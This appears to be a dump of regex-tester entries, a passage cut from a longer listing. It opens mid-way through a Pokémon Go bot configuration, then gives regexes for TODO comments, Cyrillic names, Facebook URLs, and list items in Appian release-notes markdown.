"KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Oddish": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Gloom": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Vileplume": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Paras": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Parasect": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Venonat": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Venomoth": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Diglett": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Dugtrio": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Meowth": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Persian": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Psyduck": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Golduck": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Mankey": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Primeape": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Poliwag": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Poliwhirl": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Poliwrath": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Abra": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Kadabra": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Alakazam": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Machop": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Machoke": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Machamp": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Bellsprout": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Weepinbell": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Victreebel": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Tentacool": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Tentacruel": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Geodude": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Graveler": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Golem": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Ponyta": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Rapidash": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Slowpoke": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Slowbro": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Magnemite": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Magneton": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Doduo": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Dodrio": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Seel": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Dewgong": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Grimer": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Muk": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Shellder": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Cloyster": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Gastly": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Haunter": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Gengar": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Onix": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Drowzee": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Hypno": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Krabby": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Kingler": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Voltorb": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Electrode": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Cubone": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Marowak": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Hitmonlee": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Hitmonchan": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Lickitung": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Koffing": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Weezing": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Rhyhorn": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Rhydon": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Chansey": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Tangela": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Kangaskhan": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Horsea": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Seadra": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Goldeen": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Seaking": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Staryu": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Starmie": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Scyther": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Jynx": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Electabuzz": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Magmar": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Pinsir": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Tauros": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Magikarp": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Gyarados": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Lapras": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Ditto": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Jolteon": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Porygon": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Omanyte": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Omastar": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Kabuto": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Kabutops": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Aerodactyl": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Articuno": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Zapdos": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Moltres": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Dragonair": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" }, "Zubat": { "KeepMinCp": 1, "KeepMinLvl": 25, "UseKeepMinLvl": true, "KeepMinIvPercentage": 98.0, "KeepMinDuplicatePokemon": 0, "Moves": [], "KeepMinOperator": "and", "MovesOperator": "or" } }, "PokemonToSnipe": { "Locations": [ { "Latitude": 37.786795, "Longitude": -122.422348 }, { "Latitude": -33.873086, "Longitude": 151.208036 }, { "Latitude": 34.011188, "Longitude": -118.493593 }, { "Latitude": 51.506088, "Longitude": -0.158024 }, { "Latitude": 40.779347, "Longitude": -73.962946 }, { "Latitude": 40.513852, "Longitude": -78.400545 } ], "Pokemon": [ "snorlax", "dragonite", "arcanine", "lapras", "exeggutor", "vaporeon", "dratini", "growlithe", "eevee", "exeggcute", "pikachu", "pidgey", "rattata", "weedle", "caterpie" ] }, "PokemonToUseMasterball": [ "articuno", "zapdos", "moltres", "mew", "mewtwo" ] }
JSON Matching
2016-08-14T10:53:54.000Z
[a-z,a-z]
ededwswe
hjkkk
2016-09-20T12:13:12.000Z
.*?\S?(TO\s?DO|FIXME|CODE\s?REVIEW)\s?\s?([A-Z]{2,4}).*:.*
TODO LN: //TODO LN: *TODO LN : /* TODO LN: /** TODO LN : //TODO MAP: TODO: TO DO : CODE ReVIEW MAP: //TODO remove from hereg JD: jagtieajgpa :
TODO
2019-01-21T21:19:14.000Z
^[ЁёА-я]*
Елисей Иванов Влад Никита Daladecon . Nico Евгений Понасенков
filtro rusos combot
2020-12-27T11:39:20.000Z
^((?:https?\:\/\/|www\.)(?:facebook)(?:.com\/)(?:[-a-z0-9]+\.)*[-a-z0-9]+.*?)$
http://facebook.com/hahahaha
Facebook url regex
2015-07-23T09:49:19.000Z
1\.\s\[(.*?)(?s).+?(?=^$)
New features are described below in detail. Behavior changes, resolved issues, deprecations, and removals are called out their own sections. 1. [User Interfaces](#user-interfaces) - [Sites Improvements](#sites-improvements) - [Reports in Sites](#reports-in-sites) - [Inline Task Management](#inline-task-management) - [User Record in Sites](#user-record-in-sites) - [User Profile in Sites](#user-profile-in-sites) - [Wider Sites](#wider-sites) - [Quick Apps Improvements](#quick-apps-improvements) - [Sites for Quick Apps](#sites-for-quick-apps) - [Task Reports for Quick Apps](#task-reports-for-quick-apps) - [Wider Task Interface](#wider-task-interface) - [Saving Task Changes in Embedded](#saving-task-changes-in-embedded) - [Hierarchy Tree Browser](#hierarchy-tree-browser) - [User Card for User Record Links](#user-card-for-user-record-links) - [Microsoft Edge Browser Support](#microsoft-edge-browser-support) 1. [Appian Designer](#appian-designer) - [Improved Data-Type Management for Process Models](#improved-datatype-management-for-process-models) - [Process Modeler Improvements (Preview Edition)](#process-modeler-improvements-preview-edition) - [Disable Email Notifications to Task Assignees](#disable-email-notifications-to-task-assignees) - [Multi-Select](#multiselect) - [Edge and Safari Browser Support](#edge-and-safari-browser-support) - [Window Resize](#window-resize) - [Application Builder Improvements](#application-builder-improvements) - [Sites for the Application Builder](#sites-for-the-application-builder) - [Task Reports for the Application Builder](#task-reports-for-the-application-builder) - [Smart Defaults](#smart-defaults) - [Context for Related Actions](#context-for-related-actions) - [Save-Interface-As Dialog](#saveinterfaceas-dialog) - [Save In Folder](#save-in-folder) - [Multiple Sort for a!queryEntity()](#multiple-sort-for-aqueryentity) - [Batch Testing Improvements](#batch-testing-improvements) - [New Data Types for Batch Testing of Expression Rules](#new-data-types-for-batch-testing-of-expression-rules) - [Application URL Available in Application Test Results](#application-url-available-in-application-test-results) - [List Lengths in Expression Rule Designer](#list-lengths-in-expression-rule-designer) - [Web API URLs in Designer](#web-api-urls-in-designer) - [Save as Default Test Values Link Always Shown](#save-as-default-test-values-link-always-shown) 1. [Appian Administrators](#appian-administrators) - [Import and Export of Administration Console Settings](#import-and-export-of-administration-console-settings) - [Import Customization](#import-customization) 1. [Server Administration](#server-administration) - [Process Execution Engine Throughput](#process-execution-engine-throughput) - [Expression Rule Test Cases Metrics Log](#expression-rule-test-cases-metrics-log) 1. [Appian Developer](#appian-developer) 1. [Appian Cloud](#appian-cloud) - [MySQL 5.7](#mysql-57) - [End of Support for TLS 1.0 in May of 2017](#end-of-support-for-tls-10-in-may-of-2017) 1. [Behavior Changes](#behavior-changes) 1. [Resolved Issues](#resolved-issues) - [Appian Designer](#appian-designer) - [Appian Administration Console](#appian-administration-console) - [Server Administration](#server-administration) - [Appian Developer](#appian-developer) - [Platform](#platform) 1. [Deprecations](#deprecations) - [Application Portal](#application-portal) - [Communication Smart Services](#communication-smart-services) - [Portal Management Smart Services](#portal-management-smart-services) - [Communities](#communities) - [Document Management Smart Services](#document-management-smart-services) - [Forum-related Data Types](#forumrelated-data-types) - [Attachments and Notes on Process Models](#attachments-and-notes-on-process-models) - [Deprecated System Groups](#deprecated-system-groups) - [Public Java APIs Deprecated](#public-java-apis-deprecated) - [Publishing Process Models as Web Services via UDDI](#publishing-process-models-as-web-services-via-uddi) - [TLS 1.0 on Appian Cloud](#tls-10-on-appian-cloud) - [Web.xml Modifications](#webxml-modifications) - [Multiple Gateways on Windows Environments](#multiple-gateways-on-windows-environments) 1. [Removals](#removals) - [Microsoft Internet Explorer 9 & 10](#microsoft-internet-explorer-9-10) - [Public Java APIs Removed](#public-java-apis-removed) - [Stacked Bar Chart](#stacked-bar-chart) ## User Interfaces ## This section describes new features for user interfaces, including Tempo, sites, and embedded interfaces. ### Sites Improvements ### With this version of Appian, we've expanded the functionality of the increasingly popular [sites](Sites.md) feature. #### Reports in Sites #### In addition to *task reports*, *actions* and *record types*, designers can now [configure sites with reports](Sites.md#Configure_a_Site_Page), allowing them to put important data and analysis in front of the sites users who need it. <img class="screenshot" src="images/release_notes/SitesTempoReports.png"/> #### Inline Task Management #### More [task controls](Tasks.md#Working_with_Tasks_in_Tempo) are now available for tasks in sites, allowing sites users to save, reassign, or reject tasks. #### User Record in Sites #### We've made it possible for designers to configure the *User record* and *User record* links in sites, to give sites users visibility to the other users. <img src="images/release_notes/SitesUserRecord.png"/> #### User Profile in Sites #### Users can now access and make updates to their profiles in sites. The user profile is available by clicking on the user avatar in the upper-right corner of the site. <img src="images/release_notes_16_3/userProfileSites.png" /> #### Wider Sites #### Following in Tempo's footsteps, sites are now 25% wider, giving designers more room to work with when creating interfaces. <img src="images/release_notes_16_3/Wider_Sites.png" /> ### Quick Apps Improvements ### We're contining to bring more of what users want to build with Quick Apps, and this release adds two essential Appian productivity features to the palette: [Sites](Sites.md) and [Task Reports](Task_Report_Tutorial.md). #### Sites for Quick Apps #### Users can now generate a [site](Sites.md) for any [Quick App](Quick_Apps_Designer.md). This allows users to focus on their work in a site dedicated to the Quick App. <img src="images/Quick_Apps/quickAppsSite.png" class="screenshot"/> Users will find a new checkbox when creating or updating a Quick App that allows them to generate a site for their application. While the Quick App will still be available in Tempo, users will now have the option of using their application in the new site. #### Task Reports for Quick Apps #### Quick Apps now include a default task report, which shows all tasks for a user. This report appears in the **Tasks** tab in Tempo and the **My Tasks** tab in sites (if there is one for the Quick App). <img height="95%" width="95%" align="middle" hspace="20" src="images/release_notes_16_3/quickAppsTaskReport.png"/> This task report will be added to existing Quick Apps the next time they're updated from the [Quick Apps Designer](Quick_Apps_Designer.md). ### Wider Task Interface ### The [task controls](Tasks.md#Working_with_Tasks_in_Tempo) that used to take up space in the left-hand panel (*save changes*, *reassign*, and *reject*), have been moved to a cleaner, easier-to-find, taskbar along the top of the task interface in Tempo, sites, and embedded. This frees up that space and gives designers more room to work in. <img height="95%" width="95%" align="middle" hspace="20" src="images/release_notes/inline-task-mngt.png" /> ### Saving Task Changes in Embedded ### Users of [embedded](Embedded_Interfaces.md) 